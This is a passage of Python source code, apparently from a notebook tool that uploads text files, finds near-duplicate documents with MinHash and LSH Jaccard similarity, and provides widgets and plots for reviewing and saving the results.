file['name'].endswith('.txt')]\n if len(large_text)>0:\n print('The following file(s) are larger than 1MB:', large_text)\n \n \n def extract_zip(self, zip_file):\n '''\n Load zip file\n \n Args:\n zip_file: the file containing the zipped data\n '''\n # create an input folder if not already exist\n os.makedirs('input', exist_ok=True)\n \n # read and decode the zip file\n temp = io.BytesIO(zip_file['content'])\n \n # open and extract the zip file\n with ZipFile(temp, 'r') as zip:\n # extract files\n print('Extracting {}...'.format(zip_file['name']))\n zip.extractall('./input/')\n \n # clear up temp\n temp = None\n \n \n def load_txt(self, file, n) -> list:\n '''\n Load individual txt file content and return a dictionary object, \n wrapped in a list so it can be merged with list of pervious file contents.\n \n Args:\n file: the file containing the text data\n n: index of the uploaded file (value='unzip' if the file is extracted form a zip file\n '''\n # read the unzip text file\n if n=='unzip':\n # read the unzip text file\n with open(file) as f:\n temp = {'text_name': file.name[:-4],\n 'text': f.read()\n }\n \n os.remove(file)\n else:\n file = self.file_uploader.value[n]\n # read and decode uploaded text\n temp = {'text_name': file['name'][:-4],\n 'text': codecs.decode(file['content'], encoding='utf-8', errors='replace')\n }\n \n # check for unknown characters and display warning if any\n unknown_count = temp['text'].count('�')\n if unknown_count>0:\n print('We identified {} unknown 
character(s) in the following text: {}'.format(unknown_count, file['name'][:-4]))\n \n return [temp]\n\n\n def load_table(self, file, n) -> list:\n '''\n Load csv or xlsx file\n \n Args:\n file: the file containing the excel or csv data\n n: index of the uploaded file (value='unzip' if the file is extracted form a zip file\n '''\n if n!='unzip':\n file = io.BytesIO(self.file_uploader.value[n]['content'])\n \n # read the file based on the file format\n try:\n temp_df = pd.read_csv(file)\n except:\n temp_df = pd.read_excel(file)\n \n # check if the column text and text_name present in the table, if not, skip the current spreadsheet\n if ('text' not in temp_df.columns) or ('text_name' not in temp_df.columns):\n print('File {} does not contain the required header \"text\" and \"text_name\"'.format(self.file_uploader.value[n]['name']))\n return []\n \n # return a list of dict objects\n temp = temp_df[['text_name', 'text']].to_dict(orient='index').values()\n \n return temp\n \n \n def hash_gen(self, temp_df: pd.DataFrame) -> pd.DataFrame:\n '''\n Create column text_id by md5 hash of the text in text_df\n \n Args:\n temp_df: the temporary pandas dataframe containing the text data\n '''\n temp_df['text_id'] = temp_df['text'].apply(\n lambda t: hashlib.shake_256(t.encode('utf-8')).hexdigest(5))\n \n return temp_df\n \n \n def process_upload(self, deduplication: bool = True):\n '''\n Pre-process uploaded .txt files into pandas dataframe\n\n Args:\n deduplication: option to deduplicate text_df by text_id\n '''\n # create placeholders to store all texts and zipped file names\n all_data = []; files = []\n \n # read and store the uploaded files\n uploaded_files = self.file_uploader.value\n \n # extract zip files (if any)\n for n, file in enumerate(uploaded_files):\n files.append([file.name, n])\n if file.name.lower().endswith('zip'):\n self.extract_zip(self.file_uploader.value[n])\n files.pop()\n \n # add extracted files to files\n for file_type in ['*.txt', '*.xlsx', '*.csv']:\n files += [[file, 'unzip'] for file in Path('./input').rglob(file_type) if 'MACOSX' not in str(file)]\n \n print('Reading uploaded files...')\n print('This may take a while...')\n # process and upload files\n for file, n in tqdm(files):\n # process text files\n if str(file).lower().endswith('txt'):\n text_dic = self.load_txt(file, n)\n # process xlsx or csv files\n else:\n text_dic = self.load_table(file, n)\n all_data.extend(text_dic)\n \n # remove files and directory once finished\n os.system('rm -r ./input')\n \n # convert them into a pandas dataframe format and add unique id\n self.text_df = pd.DataFrame.from_dict(all_data)\n self.text_df = self.hash_gen(self.text_df)\n \n # clear up all_data\n all_data = []; files = []\n \n # deduplicate the text_df by text_id\n if deduplication:\n self.text_df.drop_duplicates(subset='text_id', keep='first', inplace=True)\n \n \n def calculate_similarity(self, \n ngram_value: int = 1, \n num_perm: int = 256, \n similarity_cutoff: float = 0.5, \n actual_jaccard: bool = False):\n '''\n Function to calculate/estimate Jaccard similarity between documents in the corpus\n and begin the process of deduplicating based on the specified parameters\n\n Args:\n ngram_value: the n-gram size (the number of words used to detect similarity)\n num_perm: the number of permutation functions for estimating Jaccard similarity\n similarity_cutoff: the Jaccard similarity cut-off for determining similar documents\n actual_jaccard: whether to calculate actual or estimated Jaccard similarity\n remove_punc: whether 
to remove punctuation from the text\n '''\n try:\n def clean_text(text):\n '''\n Function to clean the text\n\n Args:\n text: the text to be cleaned\n '''\n # remove punctuation\n text = re.sub(r'[^\\w\\s]', ' ', text) \n \n return text\n \n if self.exclude_punc:\n self.text_df['text_with_punc'] = self.text_df['text']\n print('Pre-processing uploaded text...')\n tqdm.pandas()\n self.text_df['text'] = self.text_df['text'].progress_apply(clean_text)\n \n # Step 1: calculate word counts\n # tqdm.pandas(desc='Step 1/9',leave=False)\n # self.text_df['word_count'] = self.text_df.progress_apply(\n # lambda x: self.count_text_words(x.text), \n # axis=1)\n \n self.text_df['word_count'] = self.text_df.swifter.progress_bar(desc='Step 1/9').apply(\n lambda x: self.count_text_words(x.text), \n axis=1\n )\n \n # # Step 2: create text hash (to be used for estimating Jaccard similarity)\n # tqdm.pandas(desc='Step 2/9',leave=False)\n # self.text_df['hash'] = self.text_df.progress_apply(\n # lambda x: self.make_text_hash(x.text, \n # num_perm, \n # ngram_value), \n # axis=1)\n \n \n # Step 2: create text hash (to be used for estimating Jaccard similarity)\n # tqdm.pandas(desc='Step 2/9',leave=False)\n self.text_df['hash'] = self.text_df.swifter.progress_bar(desc='Step 2/9').apply(\n lambda x: self.make_text_hash(x.text, num_perm, ngram_value), \n axis=1\n )\n \n # Step 3 and 4: identify similar documents based on estimated Jaccard similarity\n # Create LSH index\n lsh = MinHashLSH(threshold=similarity_cutoff, num_perm=num_perm)\n \n for index, row in tqdm(self.text_df.iterrows(), \n total=len(self.text_df),\n desc='Step 3/9',leave=False):\n lsh.insert(row['text_id'], row['hash'])\n \n #print('Step 4/9...')\n # tqdm.pandas(desc='Step 4/9',leave=False)\n # self.text_df['matched_list'] = self.text_df.progress_apply(\n # lambda x: self.get_matches(lsh, \n # x.hash, \n # x.text_id), \n # axis=1)\n self.text_df['matched_list'] = self.text_df.swifter.progress_bar(desc='Step 4/9').apply(\n lambda x: self.get_matches(lsh, \n x.hash, \n x.text_id), \n axis=1)\n \n # Step 5: calculate actual or estimate Jaccard similarity\n # tqdm.pandas(desc='Step 5/9',leave=False)\n self.text_df['jaccards'] = self.text_df.swifter.progress_bar(desc='Step 5/9').apply(\n lambda x: self.get_jaccards(\n df=self.text_df, \n original=x.text_id, \n matched_list= x.matched_list, \n ngram_value=ngram_value,\n actual_jaccard=actual_jaccard), axis=1)\n \n # Step 6 & 7: collating list of similar documents\n # tqdm.pandas(desc='Step 6/9',leave=False)\n intermediate_df = self.text_df[['matched_list', \n 'text_id', \n 'text_name',\n 'jaccards']].copy()\n intermediate_df['listlen'] = intermediate_df.swifter.progress_bar(desc='Step 6/9').apply(\n lambda x: len(x.matched_list), axis = 1)\n \n # tqdm.pandas(desc='Step 7/9',leave=False)\n intermediate_df = intermediate_df[intermediate_df.listlen > 0]\n intermediate_df['text_id_duped'] = intermediate_df.swifter.progress_bar(desc='Step 7/9').apply(\n lambda x: [x.text_id] * x.listlen, axis = 1)\n \n self.deduplication_df = pd.DataFrame(\n {\n 'text_id2' : self.explode_list(intermediate_df, 'matched_list'),\n 'similarity': self.explode_list(intermediate_df, 'jaccards'),\n 'text_id1': self.explode_list(intermediate_df, 'text_id_duped'),\n }\n )\n \n # join with article dates (from metadata)\n metadata_df = self.text_df[['text_id', 'text_name', 'word_count']].copy()\n \n self.deduplication_df = self.deduplication_df.merge(\n metadata_df,\n left_on='text_id1', \n right_on='text_id', \n 
how='inner').drop('text_id', axis=1).merge(\n metadata_df, \n left_on='text_id2', \n right_on='text_id',\n suffixes=('1', '2'),\n how='left').drop('text_id', axis=1)\n \n # get similar documents id\n self.similar_doc_id = self.get_duplicate_ids(\n self.deduplication_df,\n similarity_cutoff)\n \n # Step 8: removing duplication from list of similar documents\n keep_index = {'index': [],\n 'text_pair': []}\n for index, row in tqdm(self.deduplication_df.iterrows(), \n total=len(self.deduplication_df),\n desc='Step 8/9',leave=False):\n if set([row.text_id1,row.text_id2]) not in keep_index['text_pair']:\n keep_index['index'].append(index)\n keep_index['text_pair'].append(set([row.text_id1,row.text_id2]))\n \n self.deduplication_df = self.deduplication_df[self.deduplication_df.index.isin(keep_index['index'])]\n \n # Step 9: recommendation to keep or remove and deduplciate documents\n #print('Step 9/9...')\n status1 = []; status2 = []\n for index, row in tqdm(self.deduplication_df.iterrows(), \n total=len(self.deduplication_df),\n desc='Step 9/9'):\n if row.text_id1 in self.similar_doc_id:\n status1.append('remove')\n else:\n status1.append('keep')\n if row.text_id2 in self.similar_doc_id:\n status2.append('remove')\n else:\n status2.append('keep')\n \n self.deduplication_df['status1'] = status1\n self.deduplication_df['status2'] = status2\n \n column_names = ['text_id1', 'text_name1', 'word_count1', 'status1',\n 'similarity',\n 'text_id2', 'text_name2', 'word_count2', 'status2']\n self.deduplication_df = self.deduplication_df.reindex(columns=column_names)\n self.deduplication_df = self.deduplication_df.sort_values(by='similarity', ascending=False).reset_index(drop=True)\n self.deduplication_df = self.deduplication_df[self.deduplication_df['similarity']>=similarity_cutoff]\n \n self.deduplicated_text_df = self.text_df[~self.text_df.text_id.isin(self.similar_doc_id)]\n clear_output(wait=True)\n\n print('{} pair of similar documents found in the corpus.'.format(len(self.deduplication_df)))\n \n except:\n print('No similar documents found. Please use lower simiarity cutoff to find similar documents...')\n \n \n def display_deduplication_list(self): \n '''\n Function to display deduplication text list \n '''\n # display in html format for styling purpose\n df_html = self.deduplication_df.to_html(escape=False)\n \n # Concatenating to single string\n df_html = self.style+''+df_html+\"\\n
\"\n \n # display the pair of similar texts\n display(HTML(df_html))\n \n \n def update_list(self, \n index: int, \n item: list):\n '''\n Function to update duplicated documents list based on selected action\n (whether to 'keep' or 'remove' duplicated documents)\n\n Args:\n index: the row index of the pair of documents being reviewed\n item: a list containing text_id and status ('keep' or 'remove') of the documents\n '''\n if self.deduplication_df[item[1]][index]=='remove':\n if self.deduplication_df[item[0]][index] not in self.similar_doc_id:\n self.similar_doc_id.append(self.deduplication_df[item[0]][index])\n else:\n if self.deduplication_df[item[0]][index] in self.similar_doc_id:\n self.similar_doc_id.remove(self.deduplication_df[item[0]][index])\n \n \n def save_to_csv(self, \n df: pd.DataFrame,\n out_dir: str,\n file_name: str):\n '''\n Function to save tagged texts to csv file\n \n Args:\n out_dir: the output file directory\n file_name: the name of the saved file\n '''\n # split into chunks\n chunks = np.array_split(df.index, len(df)) \n \n # save the tagged text into csv\n for chunck, subset in enumerate(tqdm(chunks)):\n if chunck == 0:\n df.loc[subset].to_csv(out_dir+file_name, \n mode='w', \n index=True)\n else:\n df.loc[subset].to_csv(out_dir+file_name, \n header=None, \n mode='a', \n index=True)\n \n \n def display_deduplication_text(self):\n '''\n Function to display pair of possible duplicated texts\n '''\n # output the list of identified duplicated texts and the recommendations\n list_out = widgets.Output()\n \n with list_out:\n self.display_deduplication_list()\n \n # widgets for selecting the row index containing pair of similar documents to review\n enter_index, index = self.select_n_widget('Select row index: ', 0)\n \n # widget to display pair of similar documents to review\n display_button, display_out = self.click_button_widget(desc='Display pair of texts', \n margin='20px 0px 10px 0px',\n width='150px')\n \n # options on what to do with pair of similar documents\n act_options = ['keep left text only', 'keep right text only', \n 'keep both', 'remove both']\n \n # default action shown based on recommendation by the tool\n default_action = {'keep & remove':act_options[0],\n 'remove & keep':act_options[1],\n 'keep & keep':act_options[2],\n 'remove & remove':act_options[3]}\n \n # widget to select action\n enter_action, select_action = self.select_options('Select action: ',\n ['None'],\n 'None')\n \n # widget to update selection based on selected action\n update_button, update_out = self.click_button_widget(desc='Update selection', \n margin='20px 0px 10px 0px',\n width='150px')\n \n nextpair_button, display_out = self.click_button_widget(desc='Next pair', \n margin='20px 0px 10px 0px',\n width='150px')\n \n prevpair_button, display_out = self.click_button_widget(desc='Previous pair', \n margin='20px 0px 10px 0px',\n width='150px')\n \n # function to define what happens when the display button is clicked\n def on_display_button_clicked(_):\n with display_out:\n clear_output()\n text_pair = self.deduplication_df[\n self.deduplication_df.index == index.value].iloc[0,:].squeeze()\n self.show_comparison(text_pair)\n \n select_action.options = act_options\n select_action.value = default_action['{} & {}'.format(text_pair.status1,\n text_pair.status2)]\n \n with save_out:\n clear_output()\n \n \n # function to define what happens when the prev button is clicked\n def on_prev_button_clicked(_):\n with display_out:\n clear_output()\n index.value = 
max(self.deduplication_df.index.min(), index.value-1)\n                text_pair = self.deduplication_df[\n                    self.deduplication_df.index == index.value].iloc[0,:].squeeze()\n                self.show_comparison(text_pair)\n                \n                select_action.options = act_options\n                select_action.value = default_action['{} & {}'.format(text_pair.status1,\n                                                                      text_pair.status2)]\n            \n            with save_out:\n                clear_output()\n\n        # function to define what happens when the next button is clicked\n        def on_next_button_clicked(_):\n            with display_out:\n                clear_output()\n                index.value = min(self.deduplication_df.index.max(), index.value+1)\n                text_pair = self.deduplication_df[\n                    self.deduplication_df.index == index.value].iloc[0,:].squeeze()\n                self.show_comparison(text_pair)\n                \n                select_action.options = act_options\n                select_action.value = default_action['{} & {}'.format(text_pair.status1,\n                                                                      text_pair.status2)]\n            \n            with save_out:\n                clear_output()\n        \n        # link the display/prev/next buttons with their functions\n        display_button.on_click(on_display_button_clicked)\n        prevpair_button.on_click(on_prev_button_clicked)\n        nextpair_button.on_click(on_next_button_clicked)\n        \n        # function to define what happens when the update button is clicked\n        def on_update_button_clicked(_):\n            with update_out:\n                clear_output()\n                chosen_action = select_action.value\n                for k, v in default_action.items():\n                    if chosen_action==v:\n                        self.deduplication_df.iloc[index.value,3]=k.split(' & ')[0]\n                        item = ['text_id1','status1']\n                        self.update_list(index.value, item)\n                        self.deduplication_df.iloc[index.value,-1]=k.split(' & ')[1]\n                        item = ['text_id2','status2']\n                        self.update_list(index.value, item)\n            \n            with list_out:\n                clear_output()\n                self.display_deduplication_list()\n            \n            with display_out:\n                clear_output()\n                text_pair = self.deduplication_df[\n                    self.deduplication_df.index == index.value].iloc[0,:].squeeze()\n                self.show_comparison(text_pair)\n            \n            with save_out:\n                clear_output()\n\n        \n        # link the update_button with the function\n        update_button.on_click(on_update_button_clicked)\n        \n        # widget to save table\n        save_button, save_out = self.click_button_widget(desc='Save table', \n                                                         margin='20px 0px 10px 0px',\n                                                         width='150px')\n        \n        # function to define what happens when the save button is clicked\n        def on_save_button_clicked(_):\n            with save_out:\n                # create an output folder if not already exist\n                os.makedirs('output', exist_ok=True)\n                \n                clear_output()\n                out_dir = './output/'\n                file_name = 'deduplication_table.csv'\n                print('Saving in progress...')\n                self.save_to_csv(self.deduplication_df,\n                                 out_dir,\n                                 file_name)\n                \n                clear_output(wait=True)\n                \n                # download the saved file onto your computer\n                print('Table saved. 
Click below to download:')\n                display(DownloadFileLink(out_dir+file_name, file_name))\n        \n        \n        # link the save_button with the function\n        save_button.on_click(on_save_button_clicked)\n        \n        # Widget Layout\n        idx_input = widgets.HBox([enter_index, index], layout=widgets.Layout(width='400px', height='30px'))\n        action_input = widgets.HBox([enter_action, select_action], layout=widgets.Layout(width='400px', height='30px'))\n        disp_btn = widgets.HBox([display_button], layout=widgets.Layout(width='400px', height='70px'))\n        update_btn = widgets.HBox([update_button], layout=widgets.Layout(width='400px', height='70px')) \n        save_btn = widgets.HBox([save_button], layout=widgets.Layout(width='220px', height='70px'))\n        prev_btn = widgets.HBox([prevpair_button], layout=widgets.Layout(width='220px', height='70px'))\n        next_btn = widgets.HBox([nextpair_button], layout=widgets.Layout(width='220px', height='70px'))\n        \n        hbox1 = widgets.HBox([idx_input, action_input], layout=widgets.Layout(width='1000px'))\n        hbox2 = widgets.HBox([disp_btn, update_btn], layout=widgets.Layout(width='1000px'))\n        hbox3 = widgets.HBox([prev_btn, next_btn, save_btn], layout=widgets.Layout(width='1000px'))\n        hbox4 = widgets.HBox([save_out], layout=widgets.Layout(width='1000px', height='60px'))\n        \n        vbox = widgets.VBox([list_out, hbox1, hbox2, hbox3, hbox4, display_out])\n        \n        return vbox\n    \n    \n    def get_duplicate_df(self, \n                         df: pd.DataFrame,\n                         duplicate: bool = False):\n        '''\n        Function to get list of duplicate/non-duplicate texts\n        \n        Args:\n            df: the dataframe containing the list of texts\n            duplicate: whether to search for duplicate/non-duplicate\n        '''\n        if duplicate:\n            temp_df = df[df.text_id.isin(self.similar_doc_id)].copy()\n        else: \n            temp_df = df[~df.text_id.isin(self.similar_doc_id)].copy()\n            if 'text_with_punc' in self.deduplicated_text_df:\n                temp_df.drop(['text'], axis=1, inplace=True)\n                temp_df.rename(columns={'text_with_punc': 'text'}, inplace=True)\n        \n        return temp_df\n    \n    \n    def save_to_zip(self,\n                    df: pd.DataFrame,\n                    filename: str):\n        '''\n        Function to save texts to a zip of .txt file\n        \n        Args:\n            df: the dataframe containing the list of texts to save\n            filename: the name of the saved file\n        '''\n        # create an output folder if not already exist\n        os.makedirs('./output/saved_files', exist_ok=True)\n        \n        for index, row in tqdm(df.iterrows(), \n                               total=len(df)):\n            #with open('./output/saved_files/{}_{}.txt'.format(row.text_id, \n            #                                                  row.text_name), 'w') as f:\n            with open('./output/saved_files/{}.txt'.format(row.text_name), 'w') as f:\n                f.write(row.text)\n        \n        def zipdir(path, ziph):\n            # ziph is zipfile handle\n            for root, dirs, files in os.walk(path):\n                for file in files:\n                    ziph.write(os.path.join(root, file), \n                               os.path.relpath(os.path.join(root, file), \n                                               os.path.join(path, '..')))\n\n        with zipfile.ZipFile('./output/'+filename, 'w', zipfile.ZIP_DEFLATED) as zipf:\n            zipdir('./output/saved_files/', zipf)\n        \n        # remove files and directory once finished\n        os.system('rm -r ./output/saved_files')\n        print('Your texts have been saved. 
Click below to download:')\n        \n        # download the zip file onto your computer\n        file_name = './output/'+filename\n        display(DownloadFileLink(file_name, file_name[9:]))\n    \n    \n    def finalise_and_save(self, n: int):\n        '''\n        Function to finalise deduplication selections and save all kept texts \n        \n        Args:\n            n: the number of rows to display\n        '''\n        # output the list of non-duplicated texts\n        deduplicated_out = widgets.Output()\n        \n        with deduplicated_out:\n            self.duplicated_text_df = self.get_duplicate_df(self.text_df, True)\n            self.deduplicated_text_df = self.get_duplicate_df(self.text_df, False)\n            display(self.deduplicated_text_df.iloc[:,0:4].head(n))\n        \n        # widget to save non-duplicated texts\n        save_button, save_out = self.click_button_widget(desc='Save non-duplicated texts', \n                                                         margin='20px 0px 10px 0px',\n                                                         width='200px')\n        \n        # function to define what happens when the save button is clicked\n        def on_save_button_clicked(_):\n            with save_out:\n                clear_output()\n                \n                # compress and save the non-duplicated text files\n                self.save_to_zip(self.deduplicated_text_df, 'deduplicated_texts.zip')\n        \n        # link the save_button with the function\n        save_button.on_click(on_save_button_clicked)\n        \n        # widget to save duplicated texts\n        save_dup_button, save_dup_out = self.click_button_widget(desc='Save duplicated texts', \n                                                         margin='5px 0px 10px 0px',\n                                                         width='200px')\n        \n        # function to define what happens when the save button is clicked\n        def on_save_dup_button_clicked(_):\n            with save_dup_out:\n                clear_output()\n                \n                # compress and save the duplicated text files\n                self.save_to_zip(self.duplicated_text_df, 'duplicated_texts.zip')\n        \n        # link the save_dup_button with the function\n        save_dup_button.on_click(on_save_dup_button_clicked)\n        \n        # displaying inputs, buttons and their outputs\n        vbox = widgets.VBox([deduplicated_out, save_button, save_out, save_dup_button, save_dup_out])\n        \n        return vbox\n    \n    \n    def show_comparison(self, text_pair: pd.Series):\n        '''\n        Function to display comparison of pair of similar texts side-by-side in html format\n        \n        Args:\n            text_pair: the pair of texts to display\n        '''\n        # obtain text and metadata\n        title1 = f'Text: {text_pair.text_name1}'\n        title2 = f'Text: {text_pair.text_name2}'\n        if self.exclude_punc:\n            text1 = self.text_df[self.text_df['text_id']==text_pair.text_id1].text_with_punc.to_list()[0]\n            text2 = self.text_df[self.text_df['text_id']==text_pair.text_id2].text_with_punc.to_list()[0]\n        else:\n            text1 = self.text_df[self.text_df['text_id']==text_pair.text_id1].text.to_list()[0]\n            text2 = self.text_df[self.text_df['text_id']==text_pair.text_id2].text.to_list()[0]\n        \n        metadata1 = f'text_id: {text_pair.text_id1}; word_count: {text_pair.word_count1}; Jaccard similarity: {text_pair.similarity}; status: {text_pair.status1}'\n        metadata2 = f'text_id: {text_pair.text_id2}; word_count: {text_pair.word_count2}; Jaccard similarity: {text_pair.similarity}; status: {text_pair.status2}'\n        \n        myhtml = html_diffs(text1, text2, title1, title2, metadata1, metadata2)\n        \n        display(HTML(myhtml))\n    \n    \n    def count_text_words(self, text: str):\n        '''\n        Function to tokenize a document and count the number of words in the document\n        \n        Args:\n            text: the text to tokenize and count the number of words\n        '''\n        return len(list(tokenize(text)))\n    \n    \n    def convertTuple(self, tup: tuple):\n        '''\n        Function to join a tuple of words into a sentence\n        \n        Args:\n            tup: the tuple containing the list of words\n        '''\n        return ' '.join(tup)\n    \n    \n    def make_text_hash(self, \n                       text: str, \n                       num_perm: int = 256, \n                       ngram_value: int = 
1):\n        '''\n        Function to create hash for each document using datasketch.MinHash\n        (https://ekzhu.com/datasketch/minhash.html)\n        \n        Args:\n            text: the text to create hash\n            num_perm: the number of permutation functions for estimating Jaccard similarity\n            ngram_value: the n-gram size (the number of words used to detect similarity)\n        '''\n        # tokenize text, obtain ngrams, convert to a list, \n        # join the items in the list and get the tuple of the new list\n        myset = set([self.convertTuple(x) for x in list(ngrams(tokenize(text), ngram_value))])\n        \n        # initiate MinHash and set the number of permutation functions used in MinHash\n        hash1 = MinHash(num_perm)\n        \n        # get minhash object from the set\n        for d in myset:\n            hash1.update(d.encode('utf8'))\n        \n        return hash1\n    \n    \n    def get_matches(self, \n                    lsh, \n                    hash_doc, \n                    text_id: str) -> list:\n        '''\n        Function to find matched documents\n        \n        Args:\n            lsh: the Locality Sensitive Hashing (LSH) index \n            hash_doc: the hash for the document\n            text_id: the text id of the document\n        '''\n        # approximate neighbours with Jaccard similarity > the set MinHashLSH threshold (in this case 0.5)\n        matches = lsh.query(hash_doc)\n        \n        # remove if article ID is the same (the same document)\n        matches.remove(text_id)\n        \n        return matches\n    \n    \n    def find_jaccard(self, \n                     set1: set, \n                     set2: set, \n                     m1, \n                     m2, \n                     actual_jaccard: bool = False):\n        '''\n        Function to calculate the Jaccard similarity between two documents (actual or MinHash estimate)\n        \n        Args:\n            set1: set of words from the first document\n            set2: set of words from the second document\n            m1: MinHash from the first document\n            m2: MinHash from the second document\n            actual_jaccard: whether to calculate actual or estimated Jaccard similarity\n        '''\n        # calculate jaccard similarity\n        if len(set1.union(set2)) != 0:\n            if actual_jaccard:\n                return len(set1.intersection(set2))/len(set1.union(set2))\n            else:\n                return m1.jaccard(m2)\n        else:\n            # both sets are empty, so there is nothing to compare;\n            # return 0 to avoid a divide-by-zero error\n            return 0\n    \n    \n    def get_jaccards(self, \n                     df: pd.DataFrame, \n                     original: str, \n                     matched_list: list, \n                     ngram_value: int, \n                     actual_jaccard: bool = False):\n        '''\n        Function to calculate Jaccard similarities between a document and its matched documents\n        \n        Args:\n            df: the pandas DataFrame containing the texts\n            original: the text id of the first document\n            matched_list: a list of text id's of the matched (possible similar) documents\n            ngram_value: the n-gram size (the number of words used to detect similarity)\n            actual_jaccard: whether to calculate actual or estimated Jaccard similarity\n        '''\n        # get ngrams and set for the selected article_id\n        body1 = df[(df['text_id'] == original)]['text'].values[0].lower()\n        set1 = set(nltk.ngrams(tokenize(body1), n=ngram_value))\n        jaccards = []\n        m1 = df[(df['text_id'] == original)]['hash'].values[0]\n        \n        # no matches for this article\n        if len(matched_list) == 0:\n            return []\n        \n        else:\n            # if matches, calculate the jaccard similarity between the sets\n            for matched_id in matched_list:\n                body2 = df[(df['text_id'] == matched_id)]['text'].values[0].lower()\n                set2 = set(nltk.ngrams(tokenize(body2), n=ngram_value))\n                m2 = df[(df['text_id'] == matched_id)]['hash'].values[0]\n                jaccard = round(self.find_jaccard(set1, set2, m1, m2, actual_jaccard),4)\n                jaccards.append(jaccard)\n        \n        return jaccards\n    \n    \n    def explode_list(self, \n                     df: pd.DataFrame, \n                     col: str) -> list:\n        '''\n        Function to convert a list of lists to a flat list\n        \n        Args:\n            df: the pandas DataFrame containing the texts\n            col: the column in the pandas DataFrame to be converted into a flat list\n        '''\n        return list(chain.from_iterable(df[col].to_list()))\n    \n    \n    def 
plot_hash_similarity_by_source(self, df: pd.DataFrame):\n        '''\n        Function to plot a histogram of similarity count\n        \n        Args:\n            df: the pandas DataFrame containing the similarity\n        '''\n        # visualise similarity scores\n        title = \"Similarity count across the entire corpus\"\n        \n        plot = sns.histplot(data=(df[\n            # return single row for article_id and similarity_score,\n            # so one row per article for this plot \n            ~df[\n                ['text_id1',\"similarity\"]]\n            .duplicated()]) , x=\"similarity\") #.set_title(title)\n        \n        plot.set(xlabel='Jaccard similarity score',\n                 ylabel='No. of similar documents',\n                 title=title)\n        \n        return plot\n    \n    def plot_data_range(self, inst):\n        '''\n        Resolve the user's plot range instruction into an index range\n        ('y' = all pairs, 'n' = none, 'N' = the first N pairs, 'min-max' = a range)\n        '''\n        if inst.lower() == 'y':\n            return self.deduplication_df.index\n        if inst.lower() == 'n':\n            return False\n        if inst.isnumeric():\n            maxidx = min(int(inst), self.deduplication_df.shape[0])\n            return self.deduplication_df.index[:maxidx]\n        if '-' in inst and len(inst.split('-')) == 2:\n            try:\n                [minidx, maxidx] = [int(n.strip()) for n in inst.split('-')]\n                maxidx = min(maxidx+1, self.deduplication_df.shape[0])\n                return self.deduplication_df.index[minidx:maxidx]\n            except ValueError:\n                return False\n        return False\n\n    \n    def plot_heatmap_similarity(self,\n                                similarity_cutoff: float = 0.5,\n                                width: int = 900,\n                                height: int = 700,\n                                font_size: str = '10px',\n                                text_color: str = 'white',\n                                inst: str='n'):\n        '''\n        Function to plot a heatmap of pairwise Jaccard similarities\n        \n        Args:\n            similarity_cutoff: the Jaccard similarity cut-off for determining similar documents\n            width: the width of the heatmap\n            height: the height of the heatmap\n            font_size: the font size of the label texts\n            text_color: the font color of the label texts\n            inst: which pairs to display ('y' = all, 'n' = none, 'N' = the first N pairs, 'min-max' = a range)\n        '''\n\n        idx = self.plot_data_range(inst)\n        if idx is False:\n            return\n        print('\\n\\033[1mYou can hover over the similar nodes to display the text name pairs.\\033[0m\\n')\n        # visualise similarity scores\n        title = 'Jaccard similarity heatmap (score>{})\\n{} pairs of similar documents ranging from {} to {}'.format(similarity_cutoff, len(idx), min(idx), max(idx))\n\n        df = self.deduplication_df.loc[idx][['text_id1','text_id2','text_name1','text_name2','similarity']]\n        df['sim_str'] = df['similarity'].apply(lambda x: round(x,2)).astype(str)\n        \n        tooltips = [\n            ('text_name1', '@text_name1'),\n            ('text_name2', '@text_name2'),\n            ('similarity', '@sim_str'),\n        ]\n\n        x_range = df[['text_id1', 'text_name1']].set_index('text_id1').to_dict()['text_name1']\n        y_range = df[['text_id2', 'text_name2']].set_index('text_id2').to_dict()['text_name2']\n\n\n        p = figure(title=title,\n                   x_range=list(x_range.keys()),\n                   y_range=list(y_range.keys()), \n                   tooltips=tooltips,\n                   plot_width=width, plot_height=height,\n                   )\n        \n        similarity_colours = linear_cmap(\"similarity\", \"Viridis256\", 1, 0)\n        \n        p.rect(\n            x=\"text_id1\",\n            y=\"text_id2\",\n            width=1,\n            height=1,\n            fill_color=similarity_colours,\n            visible=True,\n            source=df,\n        )\n        p.xaxis.major_label_orientation = \"vertical\"\n        \n        source = ColumnDataSource(df)\n        labels = LabelSet(\n            x=\"text_id1\",\n            y=\"text_id2\",\n            text='sim_str',\n            level='glyph',\n            text_align='center',\n            text_color=text_color,\n            text_font_style='bold',\n            text_font_size = {'value': font_size},\n            y_offset=0,\n            source=source,\n            render_mode='canvas'\n        )\n        p.add_layout(labels)\n        \n        legend = ColorBar(color_mapper=similarity_colours[\"transform\"])\n        p.add_layout(legend, \"right\")\n        # reset ticks label\n        p.xaxis.axis_label = 'text_name1'\n        p.yaxis.axis_label = 'text_name2'\n\n        # Replace Axis ticker labels\n        # Define custom JavaScript callback for x-axis 
tick labels\n        xaxis_tick_formatter = \"\"\"\n        tick = tick.toString();\n        return %s[tick];\n        \"\"\" % x_range\n\n        # Define custom JavaScript callback for y-axis tick labels\n        yaxis_tick_formatter = \"\"\"\n        tick = tick.toString();\n        return %s[tick];\n        \"\"\" % y_range\n\n        p.xaxis.formatter = FuncTickFormatter(code=xaxis_tick_formatter)\n        p.yaxis.formatter = FuncTickFormatter(code=yaxis_tick_formatter)\n\n        p.xaxis.axis_label_text_font_size = '16px'\n        p.yaxis.axis_label_text_font_size = '16px'\n        p.xaxis.major_label_text_font_size = '14px'\n        p.yaxis.major_label_text_font_size = '14px'\n        \n        show(p)\n    \n    \n    def get_duplicate_ids(self, \n                          df: pd.DataFrame, \n                          min_similarity: float) -> list:\n        '''\n        Function to obtain duplicated text id's based on similarity cutoff and word count\n        \n        Args:\n            df: the pandas DataFrame containing the texts\n            min_similarity: Jaccard similarity cutoff for determining similar documents\n        '''\n        df = df[df.similarity >= min_similarity]\n        df = df[df.word_count1 >= df.word_count2]\n        \n        list1 = list(df['text_id1'].values)\n        list2 = list(df['text_id2'].values)\n        assert len(list1) == len(list2)\n        \n        considered, drop = set(), []\n        \n        for i in range(len(list1)):\n            if list1[i] not in considered:\n                considered.add(list1[i])\n                considered.add(list2[i])\n                drop.append(list2[i])\n            else:\n                if list2[i] not in considered:\n                    considered.add(list2[i])\n                    drop.append(list2[i])\n        drop = sorted(list(set(drop)))\n        \n        return drop\n    \n    \n    def select_n_widget(self, \n                        instruction: str, \n                        value: int):\n        '''\n        Create widgets for selecting a number\n        \n        Args:\n            instruction: text instruction for user\n            value: initial value of the widget\n        '''\n        # widget to display instruction\n        enter_n = widgets.HTML(\n            value=instruction,\n            placeholder='',\n            